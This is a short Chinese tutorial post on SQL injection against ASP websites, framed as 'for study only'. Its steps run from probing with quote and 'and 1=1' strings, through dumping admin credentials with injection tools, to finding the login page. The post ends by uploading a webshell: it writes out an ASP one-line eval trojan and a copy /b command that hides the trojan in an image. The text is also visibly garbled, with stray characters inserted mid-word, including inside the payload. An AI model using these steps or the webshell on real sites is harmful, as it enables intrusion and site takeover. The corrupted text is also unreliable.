网络安全中SQL注入的一般方法,由于现在网站较为完善,比较难找到注入点,仅作为学习交流。
方法/步骤
1、SQL注入的原理。通过客户端提交特殊代码,让服务器出错,asp?id=x垓矗梅吒xx加‘或者and1=1或者and1=2或者anduser>0。
2、找出管理员账号。打开类似文章,找到网址包含asp?id=xxx的网页,加’尝试,用啊D注入,扫描注入点,注入检测,检测表段,可以找到管理员的账号。
3、找到管理员密码。啊D,检测字段,检测内容即可,得到加密后的密文。
4、解密管理员密码。学习简单数据编码加解密md5base64bin2hexhex2binhash等。
5、找到后台登陆地址。明小子,管理员入口扫描,对注入点扫描入口点地址,sqlmap比较快,使用获得的账号密码登陆后台。
6、找到可以上传webshell的url。对后台的添加选项就可以上传文件,特别是图片之类。
7、找到文件上传的目录,uploadfile,找到木马的地址。
8、木马的制作与上传。缬方焱蜱一句话木马<%evalrequest("passwd&quo墉掠载牿t;)%>,找到一个图片,cmd下,copy1.jpg/b+asp.asp/a3.jpg,生成新的图片,可以在原有文件中包含一句话木马,将此木马上传,改成cer后缀,从webshell上传。
